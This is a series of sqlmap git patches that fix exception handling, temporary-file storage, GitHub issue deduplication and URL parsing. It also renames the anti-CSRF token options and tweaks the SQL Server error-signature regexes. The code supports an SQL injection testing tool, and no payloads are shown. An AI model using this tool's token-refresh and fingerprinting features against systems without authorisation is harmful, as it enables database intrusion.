+        coloramainit()
+
     count = 0
     rotator = 0
 

From 80af465ce31aeaa6c8e75e3baa1a23113519121a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 9 Nov 2014 18:40:49 +0100
Subject: [PATCH 134/492] Fix for an Issue #911

---
 lib/core/bigarray.py | 21 +++++++++++++++------
 1 file changed, 15 insertions(+), 6 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 36dfd7e42..e3d33257c 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -33,8 +33,8 @@ class BigArray(list):
     def __init__(self):
         self.chunks = [[]]
         self.cache = None
-        self.length = 0
         self.filenames = set()
+        self.protected = False
         self._os_remove = os.remove
 
     def append(self, value):
@@ -78,6 +78,14 @@ class BigArray(list):
             with open(self.chunks[index], "rb") as fp:
                 self.cache = Cache(index, pickle.load(fp), False)
 
+    def __getstate__(self):
+        self.protected = True
+        return self.chunks, self.filenames, self.protected
+
+    def __setstate__(self, state):
+        self.__init__()
+        self.chunks, self.filenames, self.protected = state
+
     def __getslice__(self, i, j):
         retval = BigArray()
         i = max(0, len(self) + i if i < 0 else i)
@@ -120,8 +128,9 @@ class BigArray(list):
         return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
 
     def __del__(self):
-        for filename in self.filenames:
-            try:
-                self._os_remove(filename)
-            except:
-                pass
+        if not self.protected:
+            for filename in self.filenames:
+                try:
+                    self._os_remove(filename)
+                except:
+                    pass

From de1cf26fe66e33bd9431eff51fa27bfbc1612889 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 9 Nov 2014 18:58:25 +0100
Subject: [PATCH 135/492] Minor patch

---
 lib/core/common.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 3658940a1..b88dbeb9c 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2871,7 +2871,9 @@ def createGithubIssue(errMsg, excMsg):
         ex = None
         errMsg = errMsg[errMsg.find("\n"):]
 
-        data = {"title": "Unhandled exception (#%s)" % hashlib.md5(excMsg).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
+        _ = re.sub(r"'[^']+'", "''", excMsg)
+
+        data = {"title": "Unhandled exception (#%s)" % hashlib.md5(_).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
         req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
 
         try:

From 06bb957d13d6c4c6ea91870444a9c800c9eb61f7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 9 Nov 2014 22:07:11 +0100
Subject: [PATCH 136/492] Preventing a run of duplicate issues

---
 lib/core/common.py | 26 +++++++++++++++++++++++---
 1 file changed, 23 insertions(+), 3 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b88dbeb9c..5b1c13b7a 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1069,9 +1069,10 @@ def setPaths():
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
     # sqlmap files
-    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
     paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
+    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
     paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
+    paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
     paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
     paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
@@ -2859,6 +2860,20 @@ def createGithubIssue(errMsg, excMsg):
     Automatically create a Github issue with unhandled exception information
     """
 
+    issues = []
+    try:
+        issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
+    except:
+        pass
+    finally:
+        issues = set(issues)
+
+    _ = re.sub(r"'[^']+'", "''", excMsg)
+    key = hashlib.md5(_).hexdigest()[:8]
+
+    if key in issues:
+        return
+
     msg = "\ndo you want to automatically create a new (anonymized) issue "
     msg += "with the unhandled exception information at "
     msg += "the official Github repository? [y/N] "
@@ -2871,9 +2886,8 @@ def createGithubIssue(errMsg, excMsg):
         ex = None
         errMsg = errMsg[errMsg.find("\n"):]
 
-        _ = re.sub(r"'[^']+'", "''", excMsg)
 
-        data = {"title": "Unhandled exception (#%s)" % hashlib.md5(_).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
+        data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
         req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
 
         try:
@@ -2886,6 +2900,12 @@ def createGithubIssue(errMsg, excMsg):
         if issueUrl:
             infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
             logger.info(infoMsg)
+
+            try:
+                with open(paths.GITHUB_HISTORY, "a+b") as f:
+                    f.write("%s\n" % key)
+            except:
+                pass
         else:
             warnMsg = "something went wrong while creating a Github issue"
             if ex:

From cdbfb17408660e9dea5647ac2c5b4bf9c5feff80 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 10 Nov 2014 13:41:53 +0100
Subject: [PATCH 137/492] Patch for an Issue #919

---
 lib/core/exception.py |  3 +++
 lib/core/option.py    |  9 ++++++++-
 lib/parse/payloads.py | 10 +++++++++-
 3 files changed, 20 insertions(+), 2 deletions(-)

diff --git a/lib/core/exception.py b/lib/core/exception.py
index 562d75ecc..1fee7e89c 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
 class SqlmapGenericException(SqlmapBaseException):
     pass
 
+class SqlmapInstallationException(SqlmapBaseException):
+    pass
+
 class SqlmapMissingDependence(SqlmapBaseException):
     pass
 
diff --git a/lib/core/option.py b/lib/core/option.py
index 13b5afdbd..c8af249a0 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -84,6 +84,7 @@ from lib.core.enums import WIZARD
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapMissingMandatoryOptionException
 from lib.core.exception import SqlmapMissingPrivileges
@@ -402,7 +403,13 @@ def _loadQueries():
         return retVal
 
     tree = ElementTree()
-    tree.parse(paths.QUERIES_XML)
+    try:
+        tree.parse(paths.QUERIES_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
 
     for node in tree.findall("*"):
         queries[node.attrib['value']] = iterate(node)
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 489a23990..7a7e617b8 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -10,6 +10,7 @@ from xml.etree import ElementTree as et
 from lib.core.data import conf
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
+from lib.core.exception import SqlmapInstallationException
 
 def cleanupVals(text, tag):
     if tag in ("clause", "where"):
@@ -67,6 +68,13 @@ def parseXmlNode(node):
         conf.tests.append(test)
 
 def loadPayloads():
-    doc = et.parse(paths.PAYLOADS_XML)
+    try:
+        doc = et.parse(paths.PAYLOADS_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
+
     root = doc.getroot()
     parseXmlNode(root)

From dfa8e0456d76dd1784f734efb6d76e33340600a1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 10 Nov 2014 14:51:31 +0100
Subject: [PATCH 138/492] Potential patch for an Issue #914

---
 lib/core/common.py | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 5b1c13b7a..6fa139882 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1544,13 +1544,14 @@ def safeStringFormat(format_, params):
     elif not isListLike(params):
         retVal = retVal.replace("%s", str(params), 1)
     else:
-        count, index = 0, 0
-        if retVal.count("%s") == len(params):
-            while index != -1:
-                index = retVal.find("%s")
-                if index != -1:
-                    retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
-                    count += 1
+        start, end = 0, len(retVal)
+        match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
+        if match and PAYLOAD_DELIMITER not in match.group(1):
+            start, end = match.start(), match.end()
+        if retVal.count("%s", start, end) == len(params):
+            for param in params:
+                index = retVal.find("%s", start)
+                retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
         else:
             count = 0
             while True:

From c5df45a14f878d08e0b7c4312cf9feda99c85e85 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 11 Nov 2014 11:23:14 +0100
Subject: [PATCH 139/492] Minor bug fix (skipping HTML decoding in heuristic
 mode)

---
 lib/request/basic.py | 48 ++++++++++++++++++++++++--------------------
 1 file changed, 26 insertions(+), 22 deletions(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index 2fa61b6d2..72a5b03f7 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -268,33 +268,37 @@ def decodePage(page, contentEncoding, contentType):
 
     # can't do for all responses because we need to support binary files too
     if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
-        # e.g. &#195;&#235;&#224;&#226;&#224;
-        if "&#" in page:
-            page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
+        if kb.heuristicMode:
+            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+            page = getUnicode(page, kb.pageEncoding)
+        else:
+            # e.g. &#195;&#235;&#224;&#226;&#224;
+            if "&#" in page:
+                page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
 
-        # e.g. %20%28%29
-        if "%" in page:
-            page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
+            # e.g. %20%28%29
+            if "%" in page:
+                page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
 
-        # e.g. &amp;
-        page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
+            # e.g. &amp;
+            page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
 
-        kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
-        page = getUnicode(page, kb.pageEncoding)
+            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+            page = getUnicode(page, kb.pageEncoding)
 
-        # e.g. &#8217;&#8230;&#8482;
-        if "&#" in page:
-            def _(match):
-                retVal = match.group(0)
-                try:
-                    retVal = unichr(int(match.group(1)))
-                except ValueError:
-                    pass
-                return retVal
-            page = re.sub(r"&#(\d+);", _, page)
+            # e.g. &#8217;&#8230;&#8482;
+            if "&#" in page:
+                def _(match):
+                    retVal = match.group(0)
+                    try:
+                        retVal = unichr(int(match.group(1)))
+                    except ValueError:
+                        pass
+                    return retVal
+                page = re.sub(r"&#(\d+);", _, page)
 
-        # e.g. &zeta;
-        page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
+            # e.g. &zeta;
+            page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
 
     return page
 

From 06e6d2aaeb9dc6798cd41304b43d3cfb0676dbff Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 11 Nov 2014 11:38:14 +0100
Subject: [PATCH 140/492] Patch for an Issue #921

---
 lib/core/target.py | 20 +++++++++++++++++---
 1 file changed, 17 insertions(+), 3 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 424ebef91..a23641d42 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -565,8 +565,15 @@ def _createTargetDirs():
                 os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
             warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
             logger.warn(warnMsg)
-        except OSError, ex:    
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+        except OSError, ex:
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except IOError, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapGenericException(errMsg)
             warnMsg = "unable to create regular output directory "
             warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
             warnMsg += "Using temporary directory '%s' instead" % tempDir
@@ -580,7 +587,14 @@ def _createTargetDirs():
         try:
             os.makedirs(conf.outputPath, 0755)
         except OSError, ex:
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except IOError, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapGenericException(errMsg)
             warnMsg = "unable to create output directory "
             warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
             warnMsg += "Using temporary directory '%s' instead" % tempDir

From c98bd521c51761acd5f7225470eb08e4ca34dad4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 11 Nov 2014 11:53:51 +0100
Subject: [PATCH 141/492] Patch for an Issue #923

---
 plugins/generic/custom.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py
index 5a64f148f..62948c656 100644
--- a/plugins/generic/custom.py
+++ b/plugins/generic/custom.py
@@ -6,12 +6,13 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import re
+import sys
 
 from lib.core.common import Backend
 from lib.core.common import dataToStdout
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
-from lib.core.convert import utf8decode
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.dicts import SQL_STATEMENTS
@@ -81,7 +82,7 @@ class Custom:
 
             try:
                 query = raw_input("sql-shell> ")
-                query = utf8decode(query)
+                query = getUnicode(query, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
                 print
                 errMsg = "user aborted"

From d0afa7f325e9fcd811f41ea9b2c0c3a6ec8bdc29 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 12 Nov 2014 11:53:42 +0100
Subject: [PATCH 142/492] Bug fix for not displaying proper version in
 unhandled exception win cases

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6fa139882..60578d3a9 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2847,7 +2847,7 @@ def unhandledExceptionMessage():
     errMsg += "reproduce the bug. The "
     errMsg += "developers will try to reproduce the bug, fix it accordingly "
     errMsg += "and get back to you\n"
-    errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
+    errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
     errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))

From 671facc6d972c4cadd674d796d562c4fe4b08e27 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 13 Nov 2014 10:28:38 +0100
Subject: [PATCH 143/492] Patch for an Issue #930

---
 lib/core/common.py | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 60578d3a9..0397f6b14 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1225,7 +1225,14 @@ def parseTargetUrl():
     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
         conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
 
-    urlSplit = urlparse.urlsplit(conf.url)
+    try:
+        urlSplit = urlparse.urlsplit(conf.url)
+    except ValueError, ex:
+        errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
+        errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
+        errMsg += "in the hostname part"
+        raise SqlmapGenericException(errMsg)
+
     hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
 
     conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"

From 74eacf95fdcce35e981cc3ad64a9d6991edb8342 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 13 Nov 2014 10:52:33 +0100
Subject: [PATCH 144/492] Patch for an Issue #929

---
 lib/core/convert.py | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/lib/core/convert.py b/lib/core/convert.py
index 4f48de409..d0646e21b 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -41,6 +41,7 @@ def base64pickle(value):
     """
 
     retVal = None
+
     try:
         retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
     except:
@@ -63,7 +64,14 @@ def base64unpickle(value):
     'foobar'
     """
 
-    return pickle.loads(base64decode(value))
+    retVal = None
+
+    try:
+        retVal = pickle.loads(base64decode(value))
+    except TypeError: 
+        retVal = pickle.loads(base64decode(bytes(value)))
+
+    return retVal
 
 def hexdecode(value):
     """

From d8d9678947fe5fba8c0c351287931dff7461877f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 14 Nov 2014 00:21:04 +0100
Subject: [PATCH 145/492] Patch for an Issue #935

---
 lib/utils/google.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/google.py b/lib/utils/google.py
index 5da738dc6..9eb4b785d 100644
--- a/lib/utils/google.py
+++ b/lib/utils/google.py
@@ -152,7 +152,7 @@ class Google(object):
                         warnMsg += "to get error page information (%d)" % e.code
                         logger.critical(warnMsg)
                         return None
-                except (urllib2.URLError, socket.error, socket.timeout):
+                except:
                     errMsg = "unable to connect to DuckDuckGo"
                     raise SqlmapConnectionException(errMsg)
 

From a827453eb796afa31adc02aa4a5c3c654104ff5a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 16 Nov 2014 08:31:01 +0100
Subject: [PATCH 146/492] Update for an Issue #907

---
 plugins/generic/entries.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 7fac3c903..30d2213fc 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -339,7 +339,7 @@ class Entries:
                                                         "db": safeSQLIdentificatorNaming(conf.db)}
                     try:
                         attackDumpedTable()
-                    except Exception, ex:
+                    except (IOError, OSError), ex:
                         errMsg = "an error occurred while attacking "
                         errMsg += "table dump ('%s')" % ex
                         logger.critical(errMsg)

From bb56eb583a19f18e9b9dbf807a02b9835f0be90f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 16 Nov 2014 13:34:35 +0100
Subject: [PATCH 147/492] Minor update

---
 lib/core/common.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 0397f6b14..5b302d751 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2877,6 +2877,8 @@ def createGithubIssue(errMsg, excMsg):
         issues = set(issues)
 
     _ = re.sub(r"'[^']+'", "''", excMsg)
+    _ = re.sub(r"\s+line \d+", "", _)
+    _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
     key = hashlib.md5(_).hexdigest()[:8]
 
     if key in issues:

From 733e06e31f1b65208c2197fc7631a0e917d54ca3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 16 Nov 2014 14:25:44 +0100
Subject: [PATCH 148/492] Patch for an Issue #944

---
 lib/core/bigarray.py  | 18 ++++++++++++------
 lib/core/exception.py |  3 +++
 2 files changed, 15 insertions(+), 6 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index e3d33257c..aaa6d2e56 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -13,6 +13,7 @@ except:
 import os
 import tempfile
 
+from lib.core.exception import SqlmapSystemException
 from lib.core.settings import BIGARRAY_CHUNK_LENGTH
 
 class Cache(object):
@@ -63,12 +64,17 @@ class BigArray(list):
         return ValueError, "%s is not in list" % value
 
     def _dump(self, value):
-        handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
-        self.filenames.add(filename)
-        os.close(handle)
-        with open(filename, "w+b") as fp:
-            pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
-        return filename
+        try:
+            handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
+            self.filenames.add(filename)
+            os.close(handle)
+            with open(filename, "w+b") as fp:
+                pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
+            return filename
+        except IOError, ex:
+            errMsg = "exception occurred while storing data "
+            errMsg += "to a temporary file ('%s')" % ex
+            raise SqlmapSystemException, errMsg
 
     def _checkcache(self, index):
         if (self.cache and self.cache.index != index and self.cache.dirty):
diff --git a/lib/core/exception.py b/lib/core/exception.py
index 1fee7e89c..eed80e1eb 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -53,6 +53,9 @@ class SqlmapShellQuitException(SqlmapBaseException):
 class SqlmapSyntaxException(SqlmapBaseException):
     pass
 
+class SqlmapSystemException(SqlmapBaseException):
+    pass
+
 class SqlmapThreadException(SqlmapBaseException):
     pass
 

From 05d5342f20a3c70b2576a6fec922774226a79c4b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 17 Nov 2014 11:50:05 +0100
Subject: [PATCH 149/492] Update and patch for an Issue #2

---
 lib/controller/controller.py | 2 +-
 lib/core/optiondict.py       | 2 ++
 lib/core/settings.py         | 2 +-
 lib/core/target.py           | 4 ++--
 lib/parse/cmdline.py         | 4 ++--
 lib/request/connect.py       | 2 +-
 sqlmap.conf                  | 6 ++++++
 7 files changed, 15 insertions(+), 7 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index fe9c448d8..00b64295f 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -460,7 +460,7 @@ def start():
                         elif parameter == conf.csrfToken:
                             testSqlInj = False
 
-                            infoMsg = "skipping CSRF protection token parameter '%s'" % parameter
+                            infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
                             logger.info(infoMsg)
 
                         # Ignore session-like parameters for --level < 4
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index cfbd02b67..bbf56fa84 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -52,6 +52,8 @@ optDict = {
                                "safUrl":            "string",
                                "saFreq":            "integer",
                                "skipUrlEncode":     "boolean",
+                               "csrfToken":         "string",
+                               "csrfUrl":           "string",
                                "forceSSL":          "boolean",
                                "hpp":               "boolean",
                                "evalCode":          "string",
diff --git a/lib/core/settings.py b/lib/core/settings.py
index ebd6a5153..4fe7e7447 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -606,7 +606,7 @@ METASPLOIT_SESSION_TIMEOUT = 300
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
-# Infixes used for automatic recognition of parameters carrying CSRF protection tokens
+# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
 CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
 
 # Prefixes used in brute force search for web server document root
diff --git a/lib/core/target.py b/lib/core/target.py
index a23641d42..29a0c4665 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -348,14 +348,14 @@ def _setRequestParams():
 
     if conf.csrfToken:
         if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
-            errMsg = "CSRF protection token parameter '%s' not " % conf.csrfToken
+            errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
             errMsg += "found in provided GET, POST, Cookie or header values"
             raise SqlmapGenericException(errMsg)
     else:
         for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
             for parameter in conf.paramDict.get(place, {}):
                 if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
-                    message = "%s parameter '%s' appears to hold CSRF protection token. " % (place, parameter)
+                    message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
                     message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
                     test = readInput(message, default="N")
                     if test and test[0] in ("y", "Y"):
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index a3cbfe582..4e100986e 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -191,10 +191,10 @@ def cmdLineParser():
                            help="Skip URL encoding of payload data")
 
         request.add_option("--csrf-token", dest="csrfToken",
-                           help="Parameter used to hold CSRF protection token")
+                           help="Parameter used to hold anti-CSRF token")
 
         request.add_option("--csrf-url", dest="csrfUrl",
-                           help="URL address to visit to extract CSRF protection token")
+                           help="URL address to visit to extract anti-CSRF token")
 
         request.add_option("--force-ssl", dest="forceSSL",
                            action="store_true",
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 0dce14365..5f1acd2d3 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -787,7 +787,7 @@ class Connect(object):
                             break
 
                 if not token:
-                    errMsg = "CSRF protection token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                    errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
                     if not conf.csrfUrl:
                         errMsg += ". You can try to rerun by providing "
                         errMsg += "a valid value for option '--csrf-url'"
diff --git a/sqlmap.conf b/sqlmap.conf
index f89507c3e..93b2e1569 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -158,6 +158,12 @@ saFreq = 0
 # Valid: True or False
 skipUrlEncode = False
 
+# Parameter used to hold anti-CSRF token
+csrfToken = 
+
+# URL address to visit to extract anti-CSRF token
+csrfUrl = 
+
 # Force usage of SSL/HTTPS
 # Valid: True or False
 forceSSL = False

From 80b9fc48210af1c88398edea53cef12115debbc1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 19 Nov 2014 09:21:52 +0100
Subject: [PATCH 150/492] Minor fix

---
 xml/errors.xml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/xml/errors.xml b/xml/errors.xml
index c298e4a5f..20f6b9d2c 100644
--- a/xml/errors.xml
+++ b/xml/errors.xml
@@ -23,9 +23,9 @@
     <dbms value="Microsoft SQL Server">
         <error regexp="Driver.* SQL[\-\_\ ]*Server"/>
         <error regexp="OLE DB.* SQL Server"/>
-        <error regexp="(\W|\A)SQL Server.*Driver"/>
+        <error regexp="\bSQL Server.*Driver"/>
         <error regexp="Warning.*mssql_.*"/>
-        <error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
+        <error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
         <error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
         <error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
     </dbms>
